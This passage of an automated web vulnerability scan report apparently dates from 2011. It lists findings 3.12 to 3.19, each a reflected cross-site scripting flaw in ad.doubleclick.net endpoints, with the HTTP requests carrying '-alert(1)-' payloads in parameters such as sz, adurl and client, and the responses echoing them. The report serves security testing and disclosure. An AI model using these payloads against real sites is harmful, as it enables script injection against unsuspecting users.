Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=6473367370.8131766689475626&rb=445&ca=&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre647336735316&pb=&pc=&pd=&pg=&ct=1297647336737&pe=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&pf=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:36:01 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6107

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,082 Template Name = 2. Banner Creative (Flash) - In Pa
...[SNIP]...
okv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://a.rfihub.com/aci/124_0_YWE9MTU3MDUsNzM0MzMsMTQxMjEsNjgwODYsMTI0MywxNDk0MSxjeVk4UkM5UTJ5TVAscCw3NzYsMjk0NiwzMjk4MSwxODc5LDc3OTImcmI9NDQ1JnJlPTE5OTY5&dc59a"-alert(1)-"ed8a505e8a7=1http%3a%2f%2ft.mookie1.com/t/v1/clk%3FmigAgencyId%3D188%26migSource%3Dadsrv2%26migTrackDataExt%3D2426847%3B58824910%3B234278619%3B39992677%26migRandom%3D2161819%26migTrackFmtExt%3Dclient%3Bio%3Bad%3B
...[SNIP]...

3.12. http://ad.doubleclick.net/adi/N3740.270604.B3/B5123509.61 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3740.270604.B3/B5123509.61

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bcff3"-alert(1)-"0f153e75e05 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3740.270604.B3/B5123509.61;sz=728x90;pc=[TPAS_ID];ord=1297647300104;click=http://a.rfihub.com/aci/124_0_YWE9MTU3MDUsNzM0MzMsMTQxMjEsNjgwODYsMTI0MywxNDk0MSxjeVk4UkM5UTJ5TVAscCw3NzYsMjk0NiwzMjk4MSwxODc5LDc3OTImcmI9NDQ1JnJlPTE5OTY5bcff3"-alert(1)-"0f153e75e05 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=6473367370.8131766689475626&rb=445&ca=&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre647336735316&pb=&pc=&pd=&pg=&ct=1297647336737&pe=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&pf=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:35:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6007

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,082 Template Name = 2. Banner Creative (Flash) - In Pa
...[SNIP]...
Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://a.rfihub.com/aci/124_0_YWE9MTU3MDUsNzM0MzMsMTQxMjEsNjgwODYsMTI0MywxNDk0MSxjeVk4UkM5UTJ5TVAscCw3NzYsMjk0NiwzMjk4MSwxODc5LDc3OTImcmI9NDQ1JnJlPTE5OTY5bcff3"-alert(1)-"0f153e75e05http://t.mookie1.com/t/v1/clk?migAgencyId=188&migSource=adsrv2&migTrackDataExt=2426847;58824910;234278619;39992677&migRandom=2145756&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.univers
...[SNIP]...

3.13. http://ad.doubleclick.net/adi/N4270.Media6Degrees.com/B5094437.9 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4270.Media6Degrees.com/B5094437.9

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57a15"-alert(1)-"a5169947ca5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4270.Media6Degrees.com/B5094437.9;sz=300x250;ord=1297649785346;click0=http://ad.media6degrees.com/adserv/clk?tId=4401087500065260|cId=5193|cb=1297649784|notifyPort=8080|exId=23|tId=4401087500065260|ec=1|secId=859|price=AAABLiH0WMa4m9TZK-nhGAJNtNF-bSex1RpF1w|pubId=300|advId=891|notifyServer=asd116.sd.pl.pvt|spId=26917|adType=iframe|invId=3159|bid=1.53|ctrack=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLzQ3CMAwG0I9fReoaXC01rlM3Q3DgxtVN7BkYo1sxDhITUN79DTgAuInzOvMk1EYeSbxnqqsUWqo3iwhW14Tj_bm9Bpz-YzIu2jLTomb7qEwWcyYX7UWYe419nAHlhAvwfSRcgfcHP_GHBIVzAAAA%26dst%3Dhttp%253A%252F%252Fwww.adobe.com%252Fproducts%252Fcreativesuite%252Fdesign%252F%253Fsdid%253DIEFXK&57a15"-alert(1)-"a5169947ca5=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.media6degrees.com/adserv/cs?tId=4401087500065260|cb=1297649784|adType=iframe|cId=5193|ec=1|spId=26917|advId=891|exId=23|price=AAABLiH0WMa4m9TZK-nhGAJNtNF-bSex1RpF1w|pubId=300|secId=859|invId=3159|notifyServer=asd116.sd.pl.pvt|notifyPort=8080|bid=1.53|srcUrlEnc=http%3A%2F%2Fwww.drudgereport.com%2F|ctrack=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLzQ3CMAwG0I9fReoaXC01rlM3Q3DgxtVN7BkYo1sxDhITUN79DTgAuInzOvMk1EYeSbxnqqsUWqo3iwhW14Tj_bm9Bpz-YzIu2jLTomb7qEwWcyYX7UWYe419nAHlhAvwfSRcgfcHP_GHBIVzAAAA%26dst%3Dhttp%253A%252F%252Fwww.adobe.com%252Fproducts%252Fcreativesuite%252Fdesign%252F%253Fsdid%253DIEFXK
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 02:17:01 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7933

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
zOvMk1EYeSbxnqqsUWqo3iwhW14Tj_bm9Bpz-YzIu2jLTomb7qEwWcyYX7UWYe419nAHlhAvwfSRcgfcHP_GHBIVzAAAA%26dst%3Dhttp%253A%252F%252Fwww.adobe.com%252Fproducts%252Fcreativesuite%252Fdesign%252F%253Fsdid%253DIEFXK&57a15"-alert(1)-"a5169947ca5=1http://www.adobe.com/products/creativesuite/design?sdid=IEFXK");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var o
...[SNIP]...

3.14. http://ad.doubleclick.net/adi/N4270.Media6Degrees.com/B5094437.9 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4270.Media6Degrees.com/B5094437.9

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload edc03"-alert(1)-"53df0e3547d was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4270.Media6Degrees.com/B5094437.9;sz=300x250;ord=1297649785346;click0=http://ad.media6degrees.com/adserv/clk?tId=4401087500065260|cId=5193|cb=1297649784|notifyPort=8080|exId=23|tId=4401087500065260|ec=1|secId=859|price=AAABLiH0WMa4m9TZK-nhGAJNtNF-bSex1RpF1w|pubId=300|advId=891|notifyServer=asd116.sd.pl.pvt|spId=26917|adType=iframe|invId=3159|bid=1.53|ctrack=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLzQ3CMAwG0I9fReoaXC01rlM3Q3DgxtVN7BkYo1sxDhITUN79DTgAuInzOvMk1EYeSbxnqqsUWqo3iwhW14Tj_bm9Bpz-YzIu2jLTomb7qEwWcyYX7UWYe419nAHlhAvwfSRcgfcHP_GHBIVzAAAA%26dst%3Dhttp%253A%252F%252Fwww.adobe.com%252Fproducts%252Fcreativesuite%252Fdesign%252F%253Fsdid%253DIEFXKedc03"-alert(1)-"53df0e3547d HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.media6degrees.com/adserv/cs?tId=4401087500065260|cb=1297649784|adType=iframe|cId=5193|ec=1|spId=26917|advId=891|exId=23|price=AAABLiH0WMa4m9TZK-nhGAJNtNF-bSex1RpF1w|pubId=300|secId=859|invId=3159|notifyServer=asd116.sd.pl.pvt|notifyPort=8080|bid=1.53|srcUrlEnc=http%3A%2F%2Fwww.drudgereport.com%2F|ctrack=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLzQ3CMAwG0I9fReoaXC01rlM3Q3DgxtVN7BkYo1sxDhITUN79DTgAuInzOvMk1EYeSbxnqqsUWqo3iwhW14Tj_bm9Bpz-YzIu2jLTomb7qEwWcyYX7UWYe419nAHlhAvwfSRcgfcHP_GHBIVzAAAA%26dst%3Dhttp%253A%252F%252Fwww.adobe.com%252Fproducts%252Fcreativesuite%252Fdesign%252F%253Fsdid%253DIEFXK
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 02:16:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7943

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
nzOvMk1EYeSbxnqqsUWqo3iwhW14Tj_bm9Bpz-YzIu2jLTomb7qEwWcyYX7UWYe419nAHlhAvwfSRcgfcHP_GHBIVzAAAA%26dst%3Dhttp%253A%252F%252Fwww.adobe.com%252Fproducts%252Fcreativesuite%252Fdesign%252F%253Fsdid%253DIEFXKedc03"-alert(1)-"53df0e3547dhttp://www.adobe.com/products/photoshop/photoshop/?sdid=IEFXK");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var ope
...[SNIP]...

3.15. http://ad.doubleclick.net/adi/N4319.msn/B2087123.382 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4319.msn/B2087123.382

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6b10"-alert(1)-"313bfda1deb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4319.msn/B2087123.382;sz=300x250;;sz=300x250;ord=145238134?click=http://clk.atdmt.com/goiframe/196247526.198101849/270694586/direct/01%3fhref=&a6b10"-alert(1)-"313bfda1deb=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/270694586/direct;wi.300;hi.250/01?click=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 02:13:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4961

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
net/click%3Bh%3Dv8/3aae/f/6c/%2a/f%3B235359689%3B0-0%3B0%3B58334028%3B4307-300/250%3B39877283/39895070/1%3B%3B%7Esscs%3D%3fhttp://clk.atdmt.com/goiframe/196247526.198101849/270694586/direct/01%3fhref=&a6b10"-alert(1)-"313bfda1deb=1http%3a%2f%2fwww.nutrisystem.com/jsps_hmr/tracking/click.jsp%3Fiid%3D29572%26rURL%3D/webnoweeksoffernetworks");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var o
...[SNIP]...

3.16. http://ad.doubleclick.net/adi/N4319.msn/B2087123.382 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4319.msn/B2087123.382

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 588b5"-alert(1)-"bbb21bc460e was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4319.msn/B2087123.382;sz=300x250;;sz=300x250;ord=145238134?click=http://clk.atdmt.com/goiframe/196247526.198101849/270694586/direct/01%3fhref=588b5"-alert(1)-"bbb21bc460e HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/270694586/direct;wi.300;hi.250/01?click=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 02:13:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4924

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
.net/click%3Bh%3Dv8/3aae/7/69/%2a/f%3B235359689%3B0-0%3B0%3B58334028%3B4307-300/250%3B39877283/39895070/1%3B%3B%7Esscs%3D%3fhttp://clk.redcated/goiframe/196247526.198101849/270694586/direct/01%3fhref=588b5"-alert(1)-"bbb21bc460ehttp://www.nutrisystem.com/jsps_hmr/tracking/click.jsp?iid=29572&rURL=/webnoweeksoffernetworks");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "fal
...[SNIP]...

3.17. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [adurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5552.3159.GOOGLECN.COM/B5035359.26

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c47f2"-alert(1)-"54049c07273 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5552.3159.GOOGLECN.COM/B5035359.26;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B33XYFyxZTbT8PJ_6lAen3LGaC_HctfkBycz95Byx0dnYSwAQARgBIL7O5Q04AFCs18v4BmDJhqOH1KOAEKAB55Lc3gO6AQk3Mjh4OTBfYXPIAQnaAUhmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ&num=1&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g&client=ca-pub-4063878933780912&adurl=c47f2"-alert(1)-"54049c07273 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297711267&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fexploits%2Fenterprise-exploit-coverage-hoytllc.htm&dt=1297689667883&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297689667905&frm=0&adk=200505236&ga_vid=1027971351.1297689668&ga_sid=1297689668&ga_hid=1219644194&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&dff=times%20new%20roman&dfs=16&biw=1112&bih=1010&eid=33895299&fu=0&ifi=1&dtd=50&xpc=g179VgxXiq&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7835
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 14 Feb 2011 13:21:34 GMT
Expires: Mon, 14 Feb 2011 13:21:34 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
GFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ&num=1&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g&client=ca-pub-4063878933780912&adurl=c47f2"-alert(1)-"54049c07273http://embassysuites.hilton.com/en/es/promotions/es_morereasonstostay_pt/index.jhtml?WT.mc_id=z1ECNCAA2ES3D4H5MoreReason40543&cssiteid=1004575&csdartid=5784169940013199");
var fscUrl = url;
var fscUr
...[SNIP]...

3.18. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [ai parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5552.3159.GOOGLECN.COM/B5035359.26

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1417b"-alert(1)-"b9c926877f7 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5552.3159.GOOGLECN.COM/B5035359.26;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B33XYFyxZTbT8PJ_6lAen3LGaC_HctfkBycz95Byx0dnYSwAQARgBIL7O5Q04AFCs18v4BmDJhqOH1KOAEKAB55Lc3gO6AQk3Mjh4OTBfYXPIAQnaAUhmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ1417b"-alert(1)-"b9c926877f7&num=1&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g&client=ca-pub-4063878933780912&adurl=;ord=874593558? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297711267&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fexploits%2Fenterprise-exploit-coverage-hoytllc.htm&dt=1297689667883&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297689667905&frm=0&adk=200505236&ga_vid=1027971351.1297689668&ga_sid=1297689668&ga_hid=1219644194&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&dff=times%20new%20roman&dfs=16&biw=1112&bih=1010&eid=33895299&fu=0&ifi=1&dtd=50&xpc=g179VgxXiq&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 13:21:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7889

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
7O5Q04AFCs18v4BmDJhqOH1KOAEKAB55Lc3gO6AQk3Mjh4OTBfYXPIAQnaAUhmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ1417b"-alert(1)-"b9c926877f7&num=1&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fembassysuites.hilton.com/en/es/promotions/es_morereasonstostay_pt/index.jhtml%3FWT.mc_id%3Dz1ECNCAA2ES3D4
...[SNIP]...

3.19. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5552.3159.GOOGLECN.COM/B5035359.26

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 230d9"-alert(1)-"981c7121fd4 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5552.3159.GOOGLECN.COM/B5035359.26;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B33XYFyxZTbT8PJ_6lAen3LGaC_HctfkBycz95Byx0dnYSwAQARgBIL7O5Q04AFCs18v4BmDJhqOH1KOAEKAB55Lc3gO6AQk3Mjh4OTBfYXPIAQnaAUhmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ&num=1&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g&client=ca-pub-4063878933780912230d9"-alert(1)-"981c7121fd4&adurl=;ord=874593558? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
